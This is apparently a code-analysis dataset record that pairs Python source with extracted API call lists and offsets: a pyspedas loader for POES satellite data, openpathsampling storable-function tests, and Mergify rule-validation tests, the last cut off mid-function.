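# Note: the remote path layout and the CONFIG keys 'remote_data_dir' and
# 'local_data_dir' used below are assumed to be provided by .config.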
def load(trange=['2018-11-5', '2018-11-6'],
         probe=['noaa19'],
         instrument='sem',
         datatype='*',
         suffix='',
         get_support_data=False,
         varformat=None,
         downloadonly=False,
         notplot=False,
         no_update=False,
         time_clip=False):
    """
    This function loads POES Space Environment Monitor data. This function is
    not meant to be called directly; instead, see the wrapper:
        pyspedas.poes.sem
    """

    if not isinstance(probe, list):
        probe = [probe]

    out_files = []

    for prb in probe:
        if instrument == 'sem':
            pathformat = prb + '/sem2_fluxes-2sec/%Y/' + prb + '_poes-sem2_fluxes-2sec_%Y%m%d_v??.cdf'

        # find the full remote path names using the trange
        remote_names = dailynames(file_format=pathformat, trange=trange)

        for remote_file in remote_names:
            files = download(remote_file=remote_file, remote_path=CONFIG['remote_data_dir'], local_path=CONFIG['local_data_dir'], no_download=no_update)
            if files is not None:
                for file in files:
                    out_files.append(file)

    out_files = sorted(out_files)

    if downloadonly:
        return out_files

    tvars = cdf_to_tplot(out_files, suffix=suffix, merge=True, get_support_data=get_support_data, varformat=varformat, notplot=notplot)

    if notplot:
        return tvars

    if time_clip:
        for new_var in tvars:
            tclip(new_var, trange[0], trange[1], suffix='')

    return tvars
|
[
"pyspedas.analysis.time_clip.time_clip",
"pytplot.cdf_to_tplot",
"pyspedas.utilities.dailynames.dailynames",
"pyspedas.utilities.download.download"
] |
[((1505, 1633), 'pytplot.cdf_to_tplot', 'cdf_to_tplot', (['out_files'], {'suffix': 'suffix', 'merge': '(True)', 'get_support_data': 'get_support_data', 'varformat': 'varformat', 'notplot': 'notplot'}), '(out_files, suffix=suffix, merge=True, get_support_data=\n get_support_data, varformat=varformat, notplot=notplot)\n', (1517, 1633), False, 'from pytplot import cdf_to_tplot\n'), ((1053, 1102), 'pyspedas.utilities.dailynames.dailynames', 'dailynames', ([], {'file_format': 'pathformat', 'trange': 'trange'}), '(file_format=pathformat, trange=trange)\n', (1063, 1102), False, 'from pyspedas.utilities.dailynames import dailynames\n'), ((1165, 1301), 'pyspedas.utilities.download.download', 'download', ([], {'remote_file': 'remote_file', 'remote_path': "CONFIG['remote_data_dir']", 'local_path': "CONFIG['local_data_dir']", 'no_download': 'no_update'}), "(remote_file=remote_file, remote_path=CONFIG['remote_data_dir'],\n local_path=CONFIG['local_data_dir'], no_download=no_update)\n", (1173, 1301), False, 'from pyspedas.utilities.download import download\n'), ((1728, 1775), 'pyspedas.analysis.time_clip.time_clip', 'tclip', (['new_var', 'trange[0]', 'trange[1]'], {'suffix': '""""""'}), "(new_var, trange[0], trange[1], suffix='')\n", (1733, 1775), True, 'from pyspedas.analysis.time_clip import time_clip as tclip\n')]
|
import pytest
try:
    from unittest import mock
except ImportError:
    import mock
from collections import defaultdict, Counter
import itertools
import numpy as np
from openpathsampling.tests.test_helpers import make_1d_traj
from .serialization_helpers import get_uuid, set_uuid
from .storable_functions import *
_MODULE = "openpathsampling.experimental.simstore.storable_functions"
class MockBackend(object):
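    # Minimal in-memory stand-in for a simstore backend: one result table
    # per storable function, plus counters for register/load calls.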
    def __init__(self):
        self.storable_function_tables = defaultdict(dict)
        self.called_register = defaultdict(int)
        self.called_load = defaultdict(int)

    def has_table(self, table_name):
        return table_name in self.storable_function_tables

    def register_storable_function(self, table_name, result_type):
        self.storable_function_tables[table_name] = {}
        self.called_register[table_name] += 1

    def load_storable_function_results(self, func_uuid, uuids):
        table = self.storable_function_tables[func_uuid]
        found_uuids = [uuid for uuid in uuids if uuid in table]
        for uuid in uuids:
            self.called_load[uuid] += 1
        return {uuid: table[uuid] for uuid in found_uuids}

    def add_storable_function_results(self, table_name, result_dict):
        self.storable_function_tables[table_name].update(result_dict)


def test_requires_lists_pre():
    assert requires_lists_pre([1]) == [[1]]
    assert requires_lists_pre([1,2]) == [[1,2]]


@pytest.mark.parametrize('array_input,expected', [
    ([[1], [2], [3]], [1, 2, 3]),
    ([1, 2, 3], [1, 2, 3]),
    ([[1, 2], [3, 4]], [[1, 2], [3, 4]]),
    ([[[1, 2]], [[3, 4]]], [[1, 2], [3, 4]]),
])
def test_scalarize_singletons(array_input, expected):
    np.testing.assert_array_equal(
        scalarize_singletons(np.array(array_input)),
        np.array(expected)
    )


def test_scalarize_singletons_to_float():
    arr = np.array([1.0])
    arr.shape = tuple()
    scalarized = scalarize_singletons(arr)
    assert not isinstance(scalarized, np.ndarray)
    assert isinstance(scalarized, float)


def test_wrap_numpy():
    for inp in [1, [1, 2]]:
        assert isinstance(wrap_numpy(inp), np.ndarray)
class TestStorableFunctionConfig(object):
    def setup(self):
        self.config = StorableFunctionConfig(processors=[
            scalarize_singletons,
            wrap_numpy,
            requires_lists_pre,
            requires_lists_post
        ])

    @staticmethod
    def func(values):
        return np.array([s.xyz[:,0] for s in values])

    def test_register(self):
        assert len(self.config.processors) == 4
        names = ['scalarize_singletons', 'requires_lists_pre',
                 'requires_lists_post', 'wrap_numpy']
        for key in names:
            assert key in self.config.processor_dict
        assert self.config.item_preprocessors == []
        assert self.config.list_preprocessors == [requires_lists_pre]
        assert self.config.item_postprocessors == [scalarize_singletons]
        assert self.config.list_postprocessors == [wrap_numpy,
                                                   requires_lists_post]
        mock_wrap_numpy = Processor(name='wrap_numpy',
                                    stage='item-pre',
                                    func=lambda x: x)
        self.config.register(mock_wrap_numpy)
        proc_dict_wrap_numpy = self.config.processor_dict['wrap_numpy']
        assert len(self.config.processors) == 4
        assert proc_dict_wrap_numpy is mock_wrap_numpy
        assert proc_dict_wrap_numpy is not wrap_numpy
        assert mock_wrap_numpy in self.config.processors
        assert wrap_numpy not in self.config.processors
        assert self.config.item_preprocessors == [mock_wrap_numpy]
        assert self.config.list_preprocessors == [requires_lists_pre]
        assert self.config.item_postprocessors == [scalarize_singletons]
        assert self.config.list_postprocessors == [requires_lists_post]

    @pytest.mark.parametrize('style', ['obj', 'name'])
    def test_deregister(self, style):
        dereg = {'obj': wrap_numpy, 'name': 'wrap_numpy'}[style]
        assert len(self.config.processors) == 4
        self.config.deregister(dereg)
        assert len(self.config.processors) == 3
        assert 'wrap_numpy' not in self.config.processor_dict
        assert wrap_numpy not in self.config.processors

    def test_deregister_error(self):
        with pytest.raises(KeyError):
            self.config.deregister('foo')

    def test_deregister_no_error(self):
        # just run it to ensure it doesn't error out
        self.config.deregister('foo', error_if_missing=False)

    def test_func(self):
        # test of the internally used test func
        snap = make_1d_traj([5.0])[0]
        assert self.func([snap]) == [[5]]

    def test_list_preprocess(self):
        snap = make_1d_traj([5.0])[0]
        assert self.config.list_preprocess([snap]) == [[snap]]

    def test_item_preprocess(self):
        snap = make_1d_traj([5.0])[0]
        assert self.config.item_preprocess(snap) == snap

    def test_item_postprocess(self):
        np.testing.assert_array_equal(
            self.config.item_postprocess(np.array([[5.0]])),
            np.array([5.0])
        )

    def test_list_postprocess(self):
        snap = make_1d_traj([5.0])[0]
        values = self.func([snap])
        np.testing.assert_array_equal(self.config.list_postprocess(values),
                                      np.array([5.0]))

    def test_storable_function_integration(self):
        snap = make_1d_traj([5.0])[0]
        sf = StorableFunction(self.func, func_config=self.config)
        assert sf(snap) == 5.0
        np.testing.assert_array_equal(sf([snap]), np.array([5.0]))
class TestStorableFunctionResults(object):
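    # setup() backs the results object with a plain dict cache and a set of
    # locally-known UUIDs, so lookups can be tested without real storage.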
    def setup(self):
        self.cv = StorableFunction(lambda x: x)
        self.cv.__uuid__ = "funcUUID"
        self.mapping = {'UUID1': "foo",
                        'UUID2': "bar"}
        self.sfr = StorableFunctionResults(self.cv, "funcUUID")
        self.sfr.result_dict = self.mapping
        self.sfr.local_uuids = set(self.mapping.keys())

    def test_get_results_as_dict_cached(self):
        result, missing = self.sfr.get_results_as_dict({'UUID1': "object"})
        assert result == {'UUID1': "foo"}
        assert missing == {}

    def test_get_results_as_dict_missing(self):
        result, missing = self.sfr.get_results_as_dict({"UUID3": "object"})
        assert result == {}
        assert missing == {"UUID3": "object"}

    def test_get_results_as_dict_storage(self):
        pytest.skip()
        pass

    def test_update(self):
        new_sfr = StorableFunctionResults(self.cv, "funcUUID")
        new_sfr.result_dict = {'UUID3': "baz"}
        new_sfr.local_uuids = set(['UUID3'])
        self.sfr.update(new_sfr)
        assert len(self.sfr) == 3
        assert "UUID3" in self.sfr.local_uuids
        assert self.sfr.result_dict["UUID3"] == "baz"

    # TODO: test_cache_results_nonpure_function
    # if you try to cache results that don't match the original, you get an
    # error

    def test_cache_results(self):
        self.sfr.cache_results({"UUID3": "baz"})
        assert len(self.sfr) == 3
        assert "UUID3" in self.sfr.local_uuids
        assert self.sfr.result_dict["UUID3"] == "baz"

    def test_clear(self):
        assert len(self.sfr) != 0
        self.sfr.clear()
        assert len(self.sfr) == 0
        assert self.sfr.result_dict == {}
        assert self.sfr.local_uuids == set([])

    def test_len(self):
        assert len(self.sfr) == 2

    def test_to_dict_from_dict_cycle(self):
        pass
@mock.patch(_MODULE + '.get_uuid', lambda x: x)
@mock.patch(_MODULE + '.has_uuid', lambda x: isinstance(x, str))
class TestStorableFunction(object):
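    # With get_uuid/has_uuid patched above, plain strings stand in for
    # UUID-carrying objects, so these tests can pass 'uuid' directly.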
    def setup(self):
        def get_expected(uuid):
            expected = {'uuid': 'eval', 'uuid1': 'other'}
            return expected[uuid]

        self.func = StorableFunction(get_expected)

    @pytest.mark.parametrize('min_max', [(None, None), (None, 10), (0, 10)])
    def test_check_periodic(self, min_max):
        period_min, period_max = min_max
        n_nones = Counter(min_max)[None]
        expected = {2: False, 0: True, 1: 'error'}[n_nones]
        check_period = StorableFunction._check_period
        if expected == 'error':
            with pytest.raises(ValueError, match='period'):
                check_period(period_min, period_max)
        else:
            assert check_period(period_min, period_max) == expected

    def test_is_periodic(self):
        assert not self.func.is_periodic
        func = StorableFunction(lambda s: s.xyz[0][0], period_min=0.0,
                                period_max=1.0)
        assert func.is_periodic

    def test_gets_source(self):
        pytest.skip()
        pass

    def test_no_source_warning(self):
        pytest.skip()
        pass

    def test_disk_cache_property(self):
        pytest.skip()
        pass

    @pytest.mark.parametrize('mode', ['no-caching', 'analysis',
                                      'production'])
    def test_mode(self, mode):
        self.func.mode = mode
        assert self.func.mode == mode
        if mode == 'no-caching':
            assert self.func.local_cache is None
        else:
            assert self.func.local_cache is not None

    def test_bad_mode(self):
        with pytest.raises(ValueError):
            self.func.mode = 'foo'

    @staticmethod
    def _set_cache(func, mode, found_in, expected):
        if found_in == 'cache':
            func.local_cache.cache_results(expected)
        elif mode == 'no-caching':
            pass
        else:
            func.local_cache.clear()

    @staticmethod
    def _set_storage(func, mode, found_in, expected):
        if found_in == 'storage':
            def get_storage(cv_uuid, uuids):
                missing = {uuid: uuids[uuid] for uuid in uuids
                           if uuid not in expected.keys()}
                found = {uuid: uuids[uuid] for uuid in uuids
                         if uuid in expected.keys()}
                return {uuid: expected[uuid] for uuid in found}, missing
        else:
            def get_storage(cv_uuid, uuids):
                return {}, dict(uuids)

        storage = mock.MagicMock(get_function_results=get_storage)
        func._handlers.add(storage)

    @pytest.mark.parametrize('mode, found_in', [
        ('analysis', 'storage'), ('analysis', 'cache'),
        ('analysis', 'eval'), ('production', 'cache'),
        ('production', 'eval'), ('no-caching', 'eval')
    ])
    def test_call(self, mode, found_in):
        # mode = 'analysis'
        # found_in = 'cache'
        # setup, depending on the parametrized parameters
        expected = {'uuid': 'eval'}
        get_expected = lambda x: expected[x]
        func = StorableFunction(get_expected)
        func.mode = mode
        self._set_cache(func, mode, found_in, expected={'uuid': 'cache'})
        self._set_storage(func, mode, found_in, expected={'uuid': 'storage'})
        # validation of correct behavior
        # NOTE: some of this testing is based on internal behavior, which
        # perhaps shouldn't be in the public-facing API
        if found_in != 'cache' and mode != 'no-caching':
            assert 'uuid' not in func.local_cache.result_dict
        assert func('uuid') == found_in
        if mode != 'no-caching':
            assert func.local_cache.result_dict['uuid'] == found_in

    @pytest.mark.parametrize("found_in_1, found_in_2", [
        ('storage', 'storage'), ('cache', 'cache'), ('eval', 'eval'),
        ('cache', 'eval')
    ])
    def test_call_multiple(self, found_in_1, found_in_2):
        # only test this in analysis
        expected_dict = {'uuid': found_in_1, 'other': found_in_2}
        expected = {
            level: {uuid: expected
                    for uuid, expected in expected_dict.items()
                    if expected == level}
            for level in ['eval', 'cache', 'storage']
        }
        get_expected = lambda x: expected['eval'][x]
        func = StorableFunction(get_expected)
        self._set_cache(func, 'analysis', 'cache',
                        expected=expected['cache'])
        self._set_storage(func, 'analysis', 'storage',
                          expected=expected['storage'])
        assert func(['uuid', 'other']) == [found_in_1, found_in_2]

    def test_to_dict_from_dict_cycle(self):
        pytest.skip()
        pass

    def test_full_serialization_cycle(self):
        pytest.skip()
        pass

    @pytest.mark.parametrize('found_in', ['cache', 'storage', 'eval'])
    def test_analysis_mode_integration(self, found_in):
        pytest.skip()
        pass
class TestStorageFunctionHandler(object):
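    # End-to-end handler tests against MockBackend: registration of
    # canonical functions, cache updates, and found/missing result lookup.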
    def setup(self):
        self.backend = MockBackend()
        self.storage = mock.NonCallableMock(backend=self.backend)
        self.sf_handler = StorageFunctionHandler(self.storage)
        self.func = StorableFunction(lambda x: x.xyz[0][0])
        self.f2 = StorableFunction.from_dict(self.func.to_dict())
        set_uuid(self.f2, get_uuid(self.func))
        self.result_dict = {'snap1': 5.0, 'snap2': 3.0}

    @staticmethod
    def _make_sfr(func, result_dict):
        sfr = StorableFunctionResults(func, get_uuid(func))
        sfr.cache_results(result_dict)
        return sfr

    def test_codec_settings(self):
        # TODO: is this actually used?
        pytest.skip()

    @pytest.mark.parametrize('has_table, with_result',
                             itertools.product([True, False],
                                               [True, False]))
    def test_register_function(self, has_table, with_result):
        uuid = get_uuid(self.func)
        if has_table:
            self.storage.backend.storable_function_tables[uuid] = {}
        example = 1.0 if with_result else None
        unable_to_register = example is None and not has_table
        add_table = not has_table and not unable_to_register

        assert not self.func.has_handler
        assert len(self.sf_handler.all_functions) == 0
        assert self.sf_handler.functions == []

        self.sf_handler.register_function(self.func, example)
        sf_tables = self.backend.storable_function_tables
        if not unable_to_register:
            assert uuid in sf_tables
        else:
            assert uuid not in sf_tables
        assert self.func is self.sf_handler.canonical_functions[uuid]
        assert self.sf_handler.all_functions[uuid] == [self.func]
        if not unable_to_register:
            assert self.func.has_handler
            assert self.func._handlers == {self.sf_handler}
        assert self.sf_handler.functions == [self.func]

        # make a copy of the func
        assert get_uuid(self.f2) == get_uuid(self.func)
        assert self.f2 is not self.func
        # internal checks should ensure that you call add_table False here
        expected_calls = {True: 1, False: 0}[add_table]
        assert self.backend.called_register[uuid] == expected_calls
        self.sf_handler.register_function(self.f2, example)
        assert self.sf_handler.canonical_functions[uuid] is not self.f2
        assert self.sf_handler.canonical_functions[uuid] is self.func
        assert self.sf_handler.all_functions[uuid] == [self.func, self.f2]
        assert self.backend.called_register[uuid] == expected_calls
        assert self.sf_handler.functions == [self.func]

    def test_update_cache(self):
        self.sf_handler.register_function(self.func)
        item1, item2 = self.result_dict.items()
        sfr1 = self._make_sfr(self.func, dict([item1]))
        sfr2 = self._make_sfr(self.f2, dict([item2]))
        assert self.func.local_cache.result_dict == {}
        self.sf_handler.update_cache(sfr1)
        assert self.func.local_cache.result_dict == {'snap1': 5.0}
        # register a new function; models the parallel update
        self.sf_handler.update_cache(sfr2)
        assert self.func.local_cache.result_dict == self.result_dict

    def test_clear_non_canonical(self):
        sf_handler = self.sf_handler
        uuid = get_uuid(self.func)
        sf_handler.register_function(self.func)
        sf_handler.register_function(self.f2)
        assert sf_handler.canonical_functions[uuid] == self.func
        assert sf_handler.all_functions[uuid] == [self.func, self.f2]
        sf_handler.clear_non_canonical()
        assert sf_handler.canonical_functions[uuid] == self.func
        assert sf_handler.all_functions[uuid] == [self.func]

    @pytest.mark.parametrize('inputs', [['snap1'], ['snap1', 'snap2']])
    def test_get_function_results(self, inputs):
        sf_handler = self.sf_handler
        sf_handler.register_function(self.func)
        uuid = get_uuid(self.func)
        registered_values = {uuid: value
                             for uuid, value in self.result_dict.items()
                             if uuid in inputs}
        self.backend.add_storable_function_results(
            table_name=get_uuid(self.func),
            result_dict=registered_values
        )
        uuid_items = {'snap1': "This is snap1",
                      'snap2': "This is snap2"}
        expected_found = {uuid: self.result_dict[uuid] for uuid in inputs}
        missing_uuids = [uuid for uuid in uuid_items.keys()
                         if uuid not in registered_values]
        expected_missing = {uuid: uuid_items[uuid]
                            for uuid in missing_uuids}
        found, missing = sf_handler.get_function_results(uuid, uuid_items)
        assert found == expected_found
        assert missing == expected_missing
|
[
"collections.Counter",
"pytest.skip",
"mock.patch",
"collections.defaultdict",
"mock.NonCallableMock",
"pytest.raises",
"numpy.array",
"itertools.product",
"pytest.mark.parametrize",
"mock.MagicMock",
"openpathsampling.tests.test_helpers.make_1d_traj"
] |
[((1438, 1630), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""array_input,expected"""', '[([[1], [2], [3]], [1, 2, 3]), ([1, 2, 3], [1, 2, 3]), ([[1, 2], [3, 4]], [\n [1, 2], [3, 4]]), ([[[1, 2]], [[3, 4]]], [[1, 2], [3, 4]])]'], {}), "('array_input,expected', [([[1], [2], [3]], [1, 2, 3\n ]), ([1, 2, 3], [1, 2, 3]), ([[1, 2], [3, 4]], [[1, 2], [3, 4]]), ([[[1,\n 2]], [[3, 4]]], [[1, 2], [3, 4]])])\n", (1461, 1630), False, 'import pytest\n'), ((7628, 7674), 'mock.patch', 'mock.patch', (["(_MODULE + '.get_uuid')", '(lambda x: x)'], {}), "(_MODULE + '.get_uuid', lambda x: x)\n", (7638, 7674), False, 'import mock\n'), ((1869, 1884), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (1877, 1884), True, 'import numpy as np\n'), ((3944, 3993), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""style"""', "['obj', 'name']"], {}), "('style', ['obj', 'name'])\n", (3967, 3993), False, 'import pytest\n'), ((7979, 8050), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""min_max"""', '[(None, None), (None, 10), (0, 10)]'], {}), "('min_max', [(None, None), (None, 10), (0, 10)])\n", (8002, 8050), False, 'import pytest\n'), ((8967, 9040), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""mode"""', "['no-caching', 'analysis', 'production']"], {}), "('mode', ['no-caching', 'analysis', 'production'])\n", (8990, 9040), False, 'import pytest\n'), ((10361, 10557), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""mode, found_in"""', "[('analysis', 'storage'), ('analysis', 'cache'), ('analysis', 'eval'), (\n 'production', 'cache'), ('production', 'eval'), ('no-caching', 'eval')]"], {}), "('mode, found_in', [('analysis', 'storage'), (\n 'analysis', 'cache'), ('analysis', 'eval'), ('production', 'cache'), (\n 'production', 'eval'), ('no-caching', 'eval')])\n", (10384, 10557), False, 'import pytest\n'), ((11478, 11614), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""found_in_1, found_in_2"""', "[('storage', 'storage'), ('cache', 'cache'), ('eval', 'eval'), ('cache',\n 'eval')]"], {}), "('found_in_1, found_in_2', [('storage', 'storage'),\n ('cache', 'cache'), ('eval', 'eval'), ('cache', 'eval')])\n", (11501, 11614), False, 'import pytest\n'), ((12568, 12633), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""found_in"""', "['cache', 'storage', 'eval']"], {}), "('found_in', ['cache', 'storage', 'eval'])\n", (12591, 12633), False, 'import pytest\n'), ((16555, 16621), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""inputs"""', "[['snap1'], ['snap1', 'snap2']]"], {}), "('inputs', [['snap1'], ['snap1', 'snap2']])\n", (16578, 16621), False, 'import pytest\n'), ((482, 499), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (493, 499), False, 'from collections import defaultdict, Counter\n'), ((531, 547), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (542, 547), False, 'from collections import defaultdict, Counter\n'), ((575, 591), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (586, 591), False, 'from collections import defaultdict, Counter\n'), ((1791, 1809), 'numpy.array', 'np.array', (['expected'], {}), '(expected)\n', (1799, 1809), True, 'import numpy as np\n'), ((2461, 2500), 'numpy.array', 'np.array', (['[s.xyz[:, 0] for s in values]'], {}), '([s.xyz[:, 0] for s in values])\n', (2469, 2500), True, 'import numpy as np\n'), ((6565, 6578), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (6576, 6578), False, 'import pytest\n'), ((8784, 8797), 'pytest.skip', 
'pytest.skip', ([], {}), '()\n', (8795, 8797), False, 'import pytest\n'), ((8858, 8871), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (8869, 8871), False, 'import pytest\n'), ((8934, 8947), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (8945, 8947), False, 'import pytest\n'), ((10270, 10318), 'mock.MagicMock', 'mock.MagicMock', ([], {'get_function_results': 'get_storage'}), '(get_function_results=get_storage)\n', (10284, 10318), False, 'import mock\n'), ((12454, 12467), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12465, 12467), False, 'import pytest\n'), ((12535, 12548), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12546, 12548), False, 'import pytest\n'), ((12698, 12711), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12709, 12711), False, 'import pytest\n'), ((12850, 12892), 'mock.NonCallableMock', 'mock.NonCallableMock', ([], {'backend': 'self.backend'}), '(backend=self.backend)\n', (12870, 12892), False, 'import mock\n'), ((13443, 13456), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (13454, 13456), False, 'import pytest\n'), ((13542, 13589), 'itertools.product', 'itertools.product', (['[True, False]', '[True, False]'], {}), '([True, False], [True, False])\n', (13559, 13589), False, 'import itertools\n'), ((1759, 1780), 'numpy.array', 'np.array', (['array_input'], {}), '(array_input)\n', (1767, 1780), True, 'import numpy as np\n'), ((4400, 4423), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (4413, 4423), False, 'import pytest\n'), ((4712, 4731), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4724, 4731), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((4829, 4848), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4841, 4848), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((4967, 4986), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4979, 4986), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5197, 5212), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5205, 5212), True, 'import numpy as np\n'), ((5276, 5295), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (5288, 5295), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5448, 5463), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5456, 5463), True, 'import numpy as np\n'), ((5531, 5550), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (5543, 5550), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5701, 5716), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5709, 5716), True, 'import numpy as np\n'), ((8154, 8170), 'collections.Counter', 'Counter', (['min_max'], {}), '(min_max)\n', (8161, 8170), False, 'from collections import defaultdict, Counter\n'), ((9370, 9395), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (9383, 9395), False, 'import pytest\n'), ((5165, 5182), 'numpy.array', 'np.array', (['[[5.0]]'], {}), '([[5.0]])\n', (5173, 5182), True, 'import numpy as np\n'), ((8340, 8381), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""period"""'}), "(ValueError, match='period')\n", (8353, 8381), False, 'import pytest\n')]
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2018–2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
import pytest
import voluptuous
from mergify_engine import context
from mergify_engine import rules
def test_valid_condition():
    c = rules.PullRequestRuleCondition("head~=bar")
    assert str(c) == "head~=bar"


def test_invalid_condition_re():
    with pytest.raises(voluptuous.Invalid):
        rules.PullRequestRuleCondition("head~=(bar")
@pytest.mark.parametrize(
"valid",
(
{"name": "hello", "conditions": ["head:master"], "actions": {}},
{"name": "hello", "conditions": ["base:foo", "base:baz"], "actions": {}},
),
)
def test_pull_request_rule(valid):
    rules.PullRequestRules.from_list([valid])
def test_same_names():
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {"name": "hello", "conditions": [], "actions": {}},
            {"name": "foobar", "conditions": [], "actions": {}},
            {"name": "hello", "conditions": [], "actions": {}},
        ]
    )

    assert [rule["name"] for rule in pull_request_rules] == [
        "hello #1",
        "foobar",
        "hello #2",
    ]
def test_jinja_with_list_attribute():
    pull_request_rules = rules.UserConfigurationSchema(
        """
pull_request_rules:
  - name: ahah
    conditions:
    - base=master
    actions:
      comment:
        message: |
          This pull request has been approved by:
          {% for name in approved_reviews_by %}
          @{{name}}
          {% endfor %}
          Thank you @{{author}} for your contributions!

"""
    )["pull_request_rules"]

    assert [rule["name"] for rule in pull_request_rules] == [
        "ahah",
    ]
def test_user_configuration_schema():
    with pytest.raises(voluptuous.Invalid) as exc_info:
        rules.UserConfigurationSchema("- no\n* way")
    assert str(exc_info.value) == "Invalid YAML at [line 2, column 2]"

    with pytest.raises(voluptuous.Invalid) as i:
        rules.UserConfigurationSchema(
            """
pull_request_rules:
  - name: ahah
    key: not really what we expected
"""
        )
    assert (
        str(i.value) == "extra keys not allowed @ data['pull_request_rules'][0]['key']"
    )

    ir = rules.InvalidRules(i.value, ".mergify.yml")
    assert str(ir) == (
        "* extra keys not allowed @ data['pull_request_rules'][0]['key']\n"
        "* required key not provided @ data['pull_request_rules'][0]['actions']\n"
        "* required key not provided @ data['pull_request_rules'][0]['conditions']"
    )
    assert [] == ir.get_annotations(".mergify.yml")

    with pytest.raises(voluptuous.Invalid) as i:
        rules.UserConfigurationSchema(
            """invalid:
- *yaml
"""
        )
    assert str(i.value) == "Invalid YAML at [line 2, column 3]"

    ir = rules.InvalidRules(i.value, ".mergify.yml")
    assert (
        str(ir)
        == """Invalid YAML at [line 2, column 3]
```
found undefined alias 'yaml'
  in "<unicode string>", line 2, column 3:
    - *yaml
      ^
```"""
    )
    assert [
        {
            "annotation_level": "failure",
            "end_column": 3,
            "end_line": 2,
            "message": "found undefined alias 'yaml'\n"
            '  in "<unicode string>", line 2, column 3:\n'
            "    - *yaml\n"
            "      ^",
            "path": ".mergify.yml",
            "start_column": 3,
            "start_line": 2,
            "title": "Invalid YAML",
        }
    ] == ir.get_annotations(".mergify.yml")

    with pytest.raises(voluptuous.Invalid) as i:
        rules.UserConfigurationSchema(
            """
pull_request_rules:
"""
        )
    assert (
        str(i.value)
        == "expected a list for dictionary value @ data['pull_request_rules']"
    )

    with pytest.raises(voluptuous.Invalid) as i:
        rules.UserConfigurationSchema("")
    assert str(i.value) == "expected a dictionary"
@pytest.mark.parametrize(
"invalid,match",
(
(
{"name": "hello", "conditions": ["this is wrong"], "actions": {}},
"Invalid condition ",
),
(
{"name": "invalid regexp", "conditions": ["head~=(lol"], "actions": {}},
r"Invalid condition 'head~=\(lol'. Invalid arguments: "
r"missing \), "
r"unterminated subpattern at position 0 @ ",
),
(
{"name": "hello", "conditions": ["head|4"], "actions": {}},
"Invalid condition ",
),
(
{"name": "hello", "conditions": [{"foo": "bar"}], "actions": {}},
r"expected str @ data\[0\]\['conditions'\]\[0\]",
),
(
{"name": "hello", "conditions": [], "actions": {}, "foobar": True},
"extra keys not allowed",
),
(
{"name": "hello", "conditions": [], "actions": {"merge": True}},
r"expected a dictionary for dictionary value "
r"@ data\[0\]\['actions'\]\['merge'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"backport": {"regexes": ["(azerty"]}},
},
r"missing \), unterminated subpattern at position 0 "
r"@ data\[0\]\['actions'\]\['backport'\]\['regexes'\]\[0\]",
),
(
{"name": "hello", "conditions": [], "actions": {"backport": True}},
r"expected a dictionary for dictionary value "
r"@ data\[0\]\['actions'\]\['backport'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"merge": {"strict": "yes"}},
},
r"expected bool for dictionary value @ "
r"data\[0\]\['actions'\]\['merge'\]\['strict'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"review": {"message": "{{syntax error"}},
},
r"Template syntax error @ data\[0\]\['actions'\]\['review'\]\['message'\]\[line 1\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"review": {"message": "{{unknownattribute}}"}},
},
r"Template syntax error for dictionary value @ data\[0\]\['actions'\]\['review'\]\['message'\]",
),
),
)
def test_pull_request_rule_schema_invalid(invalid, match):
    with pytest.raises(voluptuous.MultipleInvalid, match=match):
        rules.PullRequestRules.from_list([invalid])
def test_get_pull_request_rule():
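    # Build a fake GitHub client whose item()/items() calls return canned
    # review/file/status payloads, then evaluate rule matching against it.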
    client = mock.Mock()

    get_reviews = [
        {
